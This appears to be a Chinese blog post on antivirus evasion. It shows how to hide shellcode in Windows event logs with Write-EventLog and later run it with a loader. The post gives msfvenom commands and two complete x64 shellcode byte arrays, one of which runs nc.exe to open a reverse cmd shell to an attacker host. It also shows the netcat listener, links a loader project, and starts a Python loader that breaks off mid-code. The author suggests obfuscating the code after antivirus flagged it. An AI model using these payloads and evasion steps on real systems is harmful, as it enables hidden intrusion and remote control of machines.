<!DOCTYPE html>
<html lang="zh-cn">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"wanheiqiyihu.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="巧用Windows事件日志隐藏载荷根据卡巴斯基发布的研究报告发现一项恶意活动，其中的技术涉及将shellcode直接放入Windows事件日志，Windows事件日志可以被攻击者用来掩盖特洛伊木马病毒的恶意使用。实现了”无文件”攻击技术. 简单来说就是将shellcode放到windows的日志中去，然后后续只需要用加载器加载日志中的shellcode就可以实现分离免杀了。 Windows事件日志">
<meta property="og:type" content="article">
<meta property="og:title" content="巧用Windows事件日志隐藏载荷">
<meta property="og:url" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/index.html">
<meta property="og:site_name" content="十三の博客">
<meta property="og:description" content="巧用Windows事件日志隐藏载荷根据卡巴斯基发布的研究报告发现一项恶意活动，其中的技术涉及将shellcode直接放入Windows事件日志，Windows事件日志可以被攻击者用来掩盖特洛伊木马病毒的恶意使用。实现了”无文件”攻击技术. 简单来说就是将shellcode放到windows的日志中去，然后后续只需要用加载器加载日志中的shellcode就可以实现分离免杀了。 Windows事件日志">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181147969.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181314533.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181324210.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181847489.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317182124892.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317182436801.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317182459888.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317184607663.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317211809036.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317192555763.png">
<meta property="article:published_time" content="2023-03-17T13:19:20.000Z">
<meta property="article:modified_time" content="2023-03-17T13:19:57.953Z">
<meta property="article:author" content="十三">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181147969.png">

<link rel="canonical" href="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-cn'
  };
</script>

  <title>巧用Windows事件日志隐藏载荷 | 十三の博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">十三の博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-ctf做题笔记">

    <a href="/categories/Experience" rel="section"><i class="download fa-fw"></i>CTF做题笔记</a>

  </li>
        <li class="menu-item menu-item-python">

    <a href="/categories/python" rel="section"><i class="download fa-fw"></i>python</a>

  </li>
        <li class="menu-item menu-item-java">

    <a href="/categories/java" rel="section"><i class="download fa-fw"></i>java</a>

  </li>
        <li class="menu-item menu-item-读书笔记">

    <a href="/categories/readbook" rel="section"><i class="download fa-fw"></i>读书笔记</a>

  </li>
        <li class="menu-item menu-item-渗透测试">

    <a href="/categories/penetration" rel="section"><i class="download fa-fw"></i>渗透测试</a>

  </li>
        <li class="menu-item menu-item-基础">

    <a href="/categories/basic" rel="section"><i class="download fa-fw"></i>基础</a>

  </li>
        <li class="menu-item menu-item-轮子">

    <a href="/categories/lunzi" rel="section"><i class="download fa-fw"></i>轮子</a>

  </li>
        <li class="menu-item menu-item-漏洞库">

    <a href="/categories/fuxian" rel="section"><i class="download fa-fw"></i>漏洞库</a>

  </li>
        <li class="menu-item menu-item-工具">

    <a href="/categories/tools" rel="section"><i class="download fa-fw"></i>工具</a>

  </li>
        <li class="menu-item menu-item-代码审计">

    <a href="/categories/daima" rel="section"><i class="download fa-fw"></i>代码审计</a>

  </li>
        <li class="menu-item menu-item-逆向">

    <a href="/categories/nixiang" rel="section"><i class="download fa-fw"></i>逆向</a>

  </li>
        <li class="menu-item menu-item-应急响应">

    <a href="/categories/yingji" rel="section"><i class="download fa-fw"></i>应急响应</a>

  </li>
        <li class="menu-item menu-item-免杀">

    <a href="/categories/miansha" rel="section"><i class="download fa-fw"></i>免杀</a>

  </li>
        <li class="menu-item menu-item-靶场">

    <a href="/categories/bachang" rel="section"><i class="download fa-fw"></i>靶场</a>

  </li>
        <li class="menu-item menu-item-cve申请">

    <a href="/categories/cve" rel="section"><i class="download fa-fw"></i>cve申请</a>

  </li>
        <li class="menu-item menu-item-c语言">

    <a href="/categories/c" rel="section"><i class="download fa-fw"></i>c语言</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-cn">
    <link itemprop="mainEntityOfPage" href="https://wanheiqiyihu.top/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="十三">
      <meta itemprop="description" content="潜心学习，不骄不躁">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="十三の博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          巧用Windows事件日志隐藏载荷
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-03-17 21:19:20 / 修改时间：21:19:57" itemprop="dateCreated datePublished" datetime="2023-03-17T21:19:20+08:00">2023-03-17</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/miansha/" itemprop="url" rel="index"><span itemprop="name">-miansha</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="巧用Windows事件日志隐藏载荷"><a href="#巧用Windows事件日志隐藏载荷" class="headerlink" title="巧用Windows事件日志隐藏载荷"></a>巧用Windows事件日志隐藏载荷</h1><p>根据卡巴斯基发布的研究报告发现一项恶意活动，其中的技术涉及将shellcode直接放入Windows事件日志，Windows事件日志可以被攻击者用来掩盖特洛伊木马病毒的恶意使用。实现了”无文件”攻击技术.</p>
<p>简单来说就是将shellcode放到windows的日志中去，然后后续只需要用加载器加载日志中的shellcode就可以实现分离免杀了。</p>
<p>Windows事件日志文件实际上是以特定的数据结构的方式存储内容，每条记录事件的数据结构由9个字段组成，包括日志名称、来源、记录时间、事件ID、任务类别、级别、计算机、事件数据（EventData）等信息。其中事件数据<strong>仅支持消息和二进制数据</strong>。</p>
<h1 id="写入日志"><a href="#写入日志" class="headerlink" title="写入日志"></a>写入日志</h1><p>那么怎么把数据写入日志文件中呢，powershell中设置了一条命令，帮助我们方便的将数据写入日志文件中。</p>
<p>Write-EventLog命令可以将事件写入事件日志，参考微软官方文档，其中参数对应上面介绍的字段：</p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181147969.png" alt="image-20230317181147969"></p>
<p>执行命令：<code>Write-EventLog -LogName Application -Source VSS -EventID 65535 -EntryType Information -Category 0 -Message &quot;Hello World!&quot;</code></p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181314533.png" alt="image-20230317181314533"></p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181324210.png" alt="image-20230317181324210"></p>
<p>可以看到日志文件中已经有了我们写入的日志信息。</p>
<h1 id="弹计算器复现"><a href="#弹计算器复现" class="headerlink" title="弹计算器复现"></a>弹计算器复现</h1><h2 id="写入荷载"><a href="#写入荷载" class="headerlink" title="写入荷载"></a>写入荷载</h2><p>现在进行复现</p>
<p>只需在Write-EventLog中使用-RawData参数，就可以在事件日志字段中包含二进制数据，而且必须将二进制数据作为字节数组传到-RawData参数中。我们可以将其包含数据的十六进制字符串转换为字节数组，然后再传递。</p>
<p>首先，使用msfvenom生成弹计算器 payload。输出格式为十六进制字符串</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/exec CMD=calc.exe -f hex </span><br></pre></td></tr></table></figure>

<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317181847489.png" alt="image-20230317181847489"></p>
<p><a target="_blank" rel="noopener" href="http://tools.bugscaner.com/text/hex2bytes.html">在线16进制字符串转bytes - 在线工具 (bugscaner.com)</a></p>
<p>用工具转换</p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317182124892.png" alt="image-20230317182124892"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$data = [Byte[]](0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00)</span><br></pre></td></tr></table></figure>

<p>使用密钥管理服务日志和KmsRequests作为源进行事件日志写入。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Write-EventLog -LogName &#x27;Key Management Service&#x27; -Source KmsRequests -EventID 9999 -EntryType Information -Category 0 -Message &quot;Hello World!&quot; -RawData $data</span><br></pre></td></tr></table></figure>

<p>执行后，Payload已成功存储到事件日志当中。于事件日志的详细信息就能查看到。</p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317182436801.png" alt="image-20230317182436801"></p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317182459888.png" alt="image-20230317182459888"></p>
<h2 id="执行荷载"><a href="#执行荷载" class="headerlink" title="执行荷载"></a>执行荷载</h2><p>为了提取并执行写入的载荷，这边用非常简单的C++程序和Python脚本进行证明（大佬的）</p>
<p><a target="_blank" rel="noopener" href="https://github.com/ldsaiyan/EventLogPersist">ldsaiyan/EventLogPersist: A Simple Proof Code for Extracting and Executing Shellcode from Event Logs (github.com)</a></p>
<p>我这里也会在最后把代码贴出来(笑死我了，我刚把代码贴出来就报毒了，这速度也太快了。后面代码大家可以参照我以前的做做混淆算了)</p>
<p>现在把python代码打包好上传到目标机器，然后执行。</p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317184607663.png" alt="image-20230317184607663"></p>
<p>成功弹出计算器</p>
<h1 id="反弹nc命令"><a href="#反弹nc命令" class="headerlink" title="反弹nc命令"></a>反弹nc命令</h1><p>但是这个上线是有大小限制的，我尝试生成msf的shellcode过大了，无法写入日志文件。</p>
<p>所以我觉得可以尝试用nc来弄？</p>
<p>反弹一个cmd出来</p>
<p>攻击机nc监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc.exe -lvvp 6666</span><br></pre></td></tr></table></figure>

<p>目标机器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\nc.exe 192.168.75.1 6666 -e c:\windows\system32\cmd.exe</span><br></pre></td></tr></table></figure>

<p>生成shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/exec CMD=&quot;C:\Users\24205\Desktop\netcat-win32-1.12\nc.exe 192.168.75.1 6666 -e c:\windows\system32\cmd.exe&quot; -f hex </span><br></pre></td></tr></table></figure>

<h2 id="注入并执行荷载"><a href="#注入并执行荷载" class="headerlink" title="注入并执行荷载"></a>注入并执行荷载</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$data = [Byte[]](0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x43, 0x3A, 0x5C, 0x55, 0x73, 0x65, 0x72, 0x73, 0x5C, 0x32, 0x34, 0x32, 0x30, 0x35, 0x5C, 0x44, 0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x6E, 0x65, 0x74, 0x63, 0x61, 0x74, 0x2D, 0x77, 0x69, 0x6E, 0x33, 0x32, 0x2D, 0x31, 0x2E, 0x31, 0x32, 0x5C, 0x6E, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x20, 0x31, 0x39, 0x32, 0x2E, 0x31, 0x36, 0x38, 0x2E, 0x37, 0x35, 0x2E, 0x31, 0x20, 0x36, 0x36, 0x36, 0x36, 0x20, 0x2D, 0x65, 0x20, 0x63, 0x3A, 0x5C, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x5C, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x33, 0x32, 0x5C, 0x63, 0x6D, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00)</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Write-EventLog -LogName &#x27;Key Management Service&#x27; -Source KmsRequests -EventID 9999 -EntryType Information -Category 0 -Message &quot;Hello World!&quot; -RawData $data</span><br></pre></td></tr></table></figure>

<p>然后点击加载器,遂成功</p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317211809036.png" alt="image-20230317211809036"></p>
<h1 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h1><h2 id="用户限制"><a href="#用户限制" class="headerlink" title="用户限制"></a>用户限制</h2><p>事件日志的写入权限问题。为了能在事件日志条目中存储有效负载，我们拿到的权限必须要能写入日志。</p>
<h2 id="大小限制"><a href="#大小限制" class="headerlink" title="大小限制"></a>大小限制</h2><p>需要注意的另一个限制是，事件日志中可以存储的数据量有大小限制。基于事件消息字符串的最大字符限制为31,839个字符。</p>
<h2 id="更持久"><a href="#更持久" class="headerlink" title="更持久"></a>更持久</h2><p>在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\对应的日志名称下的条目中，存在一个EventMessageFile属性。如果在注入载荷的时候，事件ID不存在于该属性指定的源关联的事件消息文件中，则会出现下图这个日志消息：</p>
<p><img src="/2023/03/17/%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7/image-20230317192555763.png" alt="image-20230317192555763"></p>
<h1 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"><span class="keyword">import</span> win32evtlog</span><br><span class="line"></span><br><span class="line">server = <span class="string">&#x27;localhost&#x27;</span></span><br><span class="line">logtype = <span class="string">&#x27;Key Management Service&#x27;</span></span><br><span class="line">hand = win32evtlog.OpenEventLog(server, logtype)</span><br><span class="line">flags = win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ</span><br><span class="line">total = win32evtlog.GetNumberOfEventLogRecords(hand)</span><br><span class="line">switch = <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">calc</span>(<span 